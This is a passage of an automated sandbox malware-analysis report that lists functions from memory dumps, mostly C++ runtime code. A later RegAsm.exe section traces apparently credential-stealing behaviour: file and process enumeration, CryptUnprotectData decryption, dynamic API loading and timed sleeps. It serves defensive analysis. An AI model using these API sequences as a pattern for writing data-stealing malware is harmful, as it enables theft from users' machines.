Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: f48fe2d59dcd034836b03bb9d7560697c54eaae6973d568757c8c74737926ab6
Instruction ID: 19f97f082810a8b2f06b46a1ee798c0b101ccb09d0e0e4b331033f536bff7ec0
Opcode Fuzzy Hash: f48fe2d59dcd034836b03bb9d7560697c54eaae6973d568757c8c74737926ab6
Instruction Fuzzy Hash: D1413772900209AFCF15DF94CD89AAEBBB5FF48304F29A059F918B7251D335D960DB90

Function 00E35FD7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E35FE3
std::_Lockit::~_Lockit.LIBCPMT ref: 00E3603F

Strings

vn, xrefs: 00E3600A, 00E36024

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: vn
API String ID: 593203224-528124057
Opcode ID: 31e3523280cce7f186def04de028ae9ab9773e306d12a94db32e8ab2e414252c
Instruction ID: 8ea661650678c5d36286ff95860b60e616ea00ea1e14732dc04e133b37c40650
Opcode Fuzzy Hash: 31e3523280cce7f186def04de028ae9ab9773e306d12a94db32e8ab2e414252c
Instruction Fuzzy Hash: BF019E31600614EFCB19DB19D999E9D7BB9EF85364F140099E802AB361DF70EE45CB50

Function 00E32990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E32995
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E329DA

Part of subcall function 00E36048: _Yarn.LIBCPMT ref: 00E36067
Part of subcall function 00E36048: _Yarn.LIBCPMT ref: 00E3608B

Strings

bad locale name, xrefs: 00E329E8

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 4aef5359757a22ec9aa6ba0b0d0cdf95643934e24a880932217f91451282a472
Instruction ID: 7b36e9a0fae719e2966d6456533ce57e183315c3308b1306d15c5af6cfbc0f48
Opcode Fuzzy Hash: 4aef5359757a22ec9aa6ba0b0d0cdf95643934e24a880932217f91451282a472
Instruction Fuzzy Hash: A9F0F471105B408ED3709F798809743BEE0AF29314F049E5EE4CAD7A51E375E548CBA6

Function 00E48E6D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00E48EAD

Strings

vn, xrefs: 00E48E9D
InitializeCriticalSectionEx, xrefs: 00E48E7D

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$vn
API String ID: 2593887523-3934220263
Opcode ID: 6df9e654f6f2d748786783d8a569a686655cf70ae6d9c6b2ea42453cb8240e1b
Instruction ID: dd663aa9546ed47b123306ef669b973a96623bc44d8a73f6a9db2389731b0759
Opcode Fuzzy Hash: 6df9e654f6f2d748786783d8a569a686655cf70ae6d9c6b2ea42453cb8240e1b
Instruction Fuzzy Hash: F5E06D32540318BFCB112B51EE16EAE3F12EB00B62F049411FD1875160CA718925D790

Function 00E48CF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00E48D27

Strings

vn, xrefs: 00E48D1D
FlsAlloc, xrefs: 00E48D03

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc$vn
API String ID: 2773662609-1072134539
Opcode ID: d5f90b9c625ed421994d91d0d6657d2b7f9ec369a783c129bdc7d09d55f3228c
Instruction ID: c34587b68c033361a40cd587012575d3a71e5bfd52123facff432276288aa8de
Opcode Fuzzy Hash: d5f90b9c625ed421994d91d0d6657d2b7f9ec369a783c129bdc7d09d55f3228c
Instruction Fuzzy Hash: D7E0C231A817287F83293792AE1A9AE7E48CF40B63F053420FD05721C1AEA1190587D1

Function 00E33260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E3326F
std::_Lockit::~_Lockit.LIBCPMT ref: 00E3328A

Strings

ios_base::badbit set, xrefs: 00E33261

Memory Dump Source

Source File: 00000016.00000002.1886012870.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000016.00000002.1885928035.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886507349.0000000000E58000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886573131.0000000000E97000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000016.00000002.1886729944.0000000000E9B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_e30000_8x9h3ctqkpfTu0sNF0X2.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: ios_base::badbit set
API String ID: 593203224-3882152299
Opcode ID: a263963a72dea1293011222cbaa73858a2c8ffdabf52dda183fad6da745b7573
Instruction ID: cdaae7de5c5155418c2e4e0be04eda1b01097740293bde0ce6a40b77e0308c12
Opcode Fuzzy Hash: a263963a72dea1293011222cbaa73858a2c8ffdabf52dda183fad6da745b7573
Instruction Fuzzy Hash: 99E08671404100DFD324DF18E845BE677E4EB54311F10162FE0C1A7570EB7058C0CB80

Analysis Process: RegAsm.exePID: 7236, Parent PID: 7268COMMON

Executed Functions

Function 00409FC0 Relevance: 26.3, APIs: 17, Instructions: 760
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000), ref: 0040A045
StrCmpCA.SHLWAPI(?,00425240), ref: 0040A0A0
StrCmpCA.SHLWAPI(?,0042523C), ref: 0040A0B6
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040AB2C
FindClose.KERNEL32(000000FF), ref: 0040AB3D

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 2455f74b9c1c7d98907138d2b07a8d4f6e9f8946d28d78edb437343ec871e869
Instruction ID: 263e58a2a74b46f478eabfba2e73a67f6604dac1ca14d90e5786d28d1d592fab
Opcode Fuzzy Hash: 2455f74b9c1c7d98907138d2b07a8d4f6e9f8946d28d78edb437343ec871e869
Instruction Fuzzy Hash: 225241719002089BDF24FBB1DC56EED737DAF15304F40416AF61AA21A1EE399B88CF59

Function 1FE94CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1FE94EE1

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 1FE94FB5
exclusive, xrefs: 1FE94E81
winOpen, xrefs: 1FE95110
psow, xrefs: 1FE951F5

Memory Dump Source

Source File: 00000018.00000002.2953499666.000000001FE88000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FE80000, based on PE: true

Associated: 00000018.00000002.2953459143.000000001FE80000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000001FE81000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000001FFE6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000002008D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955355624.000000002008F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955652796.00000000200C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955705176.00000000200CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955705176.00000000200CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955705176.00000000200CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1fe80000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 067cde0bfaed49288861b7413f75fb00fc11fd6124734f5a6c922b633302c5ae
Instruction ID: 98d3697e392486fdc4e3df526c26ebc2dafc150f034f18a3acbea85e359a855e
Opcode Fuzzy Hash: 067cde0bfaed49288861b7413f75fb00fc11fd6124734f5a6c922b633302c5ae
Instruction Fuzzy Hash: 22F1C0719087018FFB148F64CC8575A77E4FB88708F10492AF945CB2A1EB39E944DBA6

Function 004138BA Relevance: 7.6, APIs: 5, Instructions: 51processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004138F5
Process32First.KERNEL32(?,00000128), ref: 00413908
Process32Next.KERNEL32(?,00000128), ref: 0041391C
StrCmpCA.SHLWAPI(?,?), ref: 00413930
FindCloseChangeNotification.KERNEL32(?), ref: 00413943

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 2a4b200a08ed556fe0b76f61f99fc73be8100933646605b45de0898bc31b2ca7
Instruction ID: c76ae2ebba4cdfdbec52cc22ef4db84e697ee2aab148ee9ae3442f35c02f241c
Opcode Fuzzy Hash: 2a4b200a08ed556fe0b76f61f99fc73be8100933646605b45de0898bc31b2ca7
Instruction Fuzzy Hash: 2B11C2B5900249EFDF118F91CD09BEFBBBDFB06791F00016AE505A62A0D7B88B40CB65

Function 0041302D Relevance: 6.0, APIs: 4, Instructions: 48encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,?,40000001,00000000,?), ref: 0041304A

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: a9920f871ca099fa25bd66280c4a213c7061ff6149498ac7186997568e83cd30
Instruction ID: ebb07d4d2038599017bd7936e312b347f00f81c902c408717c114f30d6bde88e
Opcode Fuzzy Hash: a9920f871ca099fa25bd66280c4a213c7061ff6149498ac7186997568e83cd30
Instruction Fuzzy Hash: 0B110235100208FFCF019FA0EC44BEA3FE6BF4A346F005055FA198B261C73A9AE5AB15

Function 00407E41 Relevance: 4.5, APIs: 3, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407E65
LocalAlloc.KERNEL32(00000040,00000000), ref: 00407E83
LocalFree.KERNEL32(?), ref: 00407EAB

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: ec7d2c3964d9433e1bd8db3b7e97589d228e91b9e021ed9bd7c00834a8d4e7c8
Instruction ID: c73416beba9d1fde4238afde8a7e84a4d4aa4311c1f55aef6ad3ec00fa4115b4
Opcode Fuzzy Hash: ec7d2c3964d9433e1bd8db3b7e97589d228e91b9e021ed9bd7c00834a8d4e7c8
Instruction Fuzzy Hash: 72019279900209EFCB01DF98D945A9E7BF5FB09300F0000A5F901AB2A0D774AE50DF61

Function 0041B050 Relevance: 182.0, APIs: 121, Instructions: 507
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(?,0041922C), ref: 0041B06C
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B083
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B09A
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0B1
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0C8
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0DF
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B0F6
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B10D
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B124
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B13B
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B152
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B169
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B180
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B197
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1AE
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1C5
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1DC
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B1F3
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B20A
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B221
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B238
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B24F
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B266
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B27D
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B294
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2AB
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2C2
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2D9
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B2F0
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B307
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B31E
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B335
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B34C
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B363
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B37A
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B391
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3A8
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3BF
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3D6
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B3ED
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B404
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B41B
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B432
GetProcAddress.KERNEL32(0042A450), ref: 0041B448
GetProcAddress.KERNEL32(0042A43C), ref: 0041B45E
GetProcAddress.KERNEL32(0042A428), ref: 0041B474
GetProcAddress.KERNEL32(0042A418), ref: 0041B48A
GetProcAddress.KERNEL32(0042A408), ref: 0041B4A0
GetProcAddress.KERNEL32(0042A3F4), ref: 0041B4B6
GetProcAddress.KERNEL32(0042A3E0), ref: 0041B4CC
LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4DD
LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4EE
LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B4FF
LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B510
LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B521
LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B532
LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B543
LoadLibraryA.KERNEL32(?,0041922C), ref: 0041B554
LoadLibraryA.KERNEL32(0042A3D4,?,0041922C), ref: 0041B564
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B584
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B59B
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5B2
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5C9
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B5E0
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B604
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B61B
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B632
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B649
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B660
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B677
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B68E
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6A5
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6C5
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6DC
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B6F3
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B70A
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B721
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B745
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B75C
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B773
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B78A
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7A1
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7B8
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7DC
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B7F3
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B80A
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B821
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B838
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B84F
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B866
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B87D
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B894
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8B4
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8CB
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8E2
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B8F9
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B910
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B930
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B947
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B967
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B97E
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9A2
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9B9
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9D0
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9E7
GetProcAddress.KERNEL32(?,0041922C), ref: 0041B9FE
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA15
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA2C
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA43
GetProcAddress.KERNEL32(0042A3C4), ref: 0041BA59
GetProcAddress.KERNEL32(0042A3B0), ref: 0041BA6F
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BA8F
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAA6
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BABD
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAD4
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BAF4
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB14
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB2B
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB42
GetProcAddress.KERNEL32(?,0041922C), ref: 0041BB59
GetProcAddress.KERNEL32(0042A3A0), ref: 0041BB78

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: a4580aef7196ab40cac15de4e3c6625ffa806c5fa5d16c7cc0568451c0f19aac
Instruction ID: 64df46d759b3a8e539eb425d674754a75b55508f076e1d27ec912ac7423ac894
Opcode Fuzzy Hash: a4580aef7196ab40cac15de4e3c6625ffa806c5fa5d16c7cc0568451c0f19aac
Instruction Fuzzy Hash: 9552C57D481214EFEB025F61FE19AA43FB3F70B3417197129E91289671E77648A8EF80

Function 0041AAD6 Relevance: 105.2, APIs: 70, Instructions: 160
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000014), ref: 0041AA0F
Sleep.KERNEL32(00000014), ref: 0041AA17
Sleep.KERNEL32(00000014), ref: 0041AA1F
Sleep.KERNEL32(00000014), ref: 0041AA27
Sleep.KERNEL32(00000014), ref: 0041AA2F
Sleep.KERNEL32(00000014), ref: 0041AA37
OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0041AA4D
Sleep.KERNEL32(00000014), ref: 0041AA5E
Sleep.KERNEL32(00000014), ref: 0041AA66
Sleep.KERNEL32(00000014), ref: 0041AA6E
Sleep.KERNEL32(00000014), ref: 0041AA76
Sleep.KERNEL32(00000014), ref: 0041AA7E
Sleep.KERNEL32(00000014), ref: 0041AA86
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041AA9B
Sleep.KERNEL32(00000014), ref: 0041AAA6
Sleep.KERNEL32(00000014), ref: 0041AAAE
Sleep.KERNEL32(00000014), ref: 0041AAB6
Sleep.KERNEL32(00000014), ref: 0041AABE
Sleep.KERNEL32(00000014), ref: 0041AAC6
Sleep.KERNEL32(00000014), ref: 0041AACE
Sleep.KERNEL32(00000014), ref: 0041AADA
Sleep.KERNEL32(00000014), ref: 0041AAE2
Sleep.KERNEL32(00000014), ref: 0041AAEA
Sleep.KERNEL32(00000014), ref: 0041AAF2
Sleep.KERNEL32(00000014), ref: 0041AAFA
Sleep.KERNEL32(00000014), ref: 0041AB02
CloseHandle.KERNEL32(00000000), ref: 0041AB0B
Sleep.KERNEL32(00001B58), ref: 0041AB16
Sleep.KERNEL32(00000014), ref: 0041AB1E
Sleep.KERNEL32(00000014), ref: 0041AB26
Sleep.KERNEL32(00000014), ref: 0041AB2E
Sleep.KERNEL32(00000014), ref: 0041AB36
Sleep.KERNEL32(00000014), ref: 0041AB3E
Sleep.KERNEL32(00000014), ref: 0041AB46
Sleep.KERNEL32(00000014), ref: 0041AB53
Sleep.KERNEL32(00000014), ref: 0041AB5B
Sleep.KERNEL32(00000014), ref: 0041AB63
Sleep.KERNEL32(00000014), ref: 0041AB6B
Sleep.KERNEL32(00000014), ref: 0041AB73
Sleep.KERNEL32(00000014), ref: 0041AB7B
Sleep.KERNEL32(00000014), ref: 0041AB83
Sleep.KERNEL32(00000014), ref: 0041AB8B
Sleep.KERNEL32(00000014), ref: 0041AB93
Sleep.KERNEL32(00000014), ref: 0041AB9B
Sleep.KERNEL32(00000014), ref: 0041ABA3
Sleep.KERNEL32(00000014), ref: 0041ABAB
Sleep.KERNEL32(00000014), ref: 0041ABB8
Sleep.KERNEL32(00000014), ref: 0041ABC0
Sleep.KERNEL32(00000014), ref: 0041ABC8
Sleep.KERNEL32(00000014), ref: 0041ABD0
Sleep.KERNEL32(00000014), ref: 0041ABD8
Sleep.KERNEL32(00000014), ref: 0041ABE0
Sleep.KERNEL32(00000014), ref: 0041ABE8
Sleep.KERNEL32(00000014), ref: 0041ABF0
Sleep.KERNEL32(00000014), ref: 0041ABF8
Sleep.KERNEL32(00000014), ref: 0041AC00
Sleep.KERNEL32(00000014), ref: 0041AC08
Sleep.KERNEL32(00000014), ref: 0041AC10
CloseHandle.KERNEL32(?), ref: 0041AC19
Sleep.KERNEL32(00000014), ref: 0041AC21
Sleep.KERNEL32(00000014), ref: 0041AC29
Sleep.KERNEL32(00000014), ref: 0041AC31
Sleep.KERNEL32(00000014), ref: 0041AC39
Sleep.KERNEL32(00000014), ref: 0041AC41
Sleep.KERNEL32(00000014), ref: 0041AC49
Sleep.KERNEL32(00000014), ref: 0041AC51
Sleep.KERNEL32(00000014), ref: 0041AC59
Sleep.KERNEL32(00000014), ref: 0041AC61
Sleep.KERNEL32(00000014), ref: 0041AC69
Sleep.KERNEL32(00000014), ref: 0041AC71
Sleep.KERNEL32(00000014), ref: 0041AC79
Sleep.KERNEL32(00000014), ref: 0041AC81
Sleep.KERNEL32(00000014), ref: 0041AC89
Sleep.KERNEL32(00000014), ref: 0041AC91
Sleep.KERNEL32(00000014), ref: 0041AC99
Sleep.KERNEL32(00000014), ref: 0041ACA1
Sleep.KERNEL32(00000014), ref: 0041ACA9
ExitProcess.KERNEL32 ref: 0041ACB1

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: Sleep$CloseEventHandle$CreateExitOpenProcess
String ID:
API String ID: 3990214622-0
Opcode ID: 35f27fa272589be9e4fb75abc68f573cec913dc016191595aadbbc2473d1eb49
Instruction ID: 010346d2f35c5d2b6dfb22c7d70376198b9011b0162d7776d674804ad5e558a3
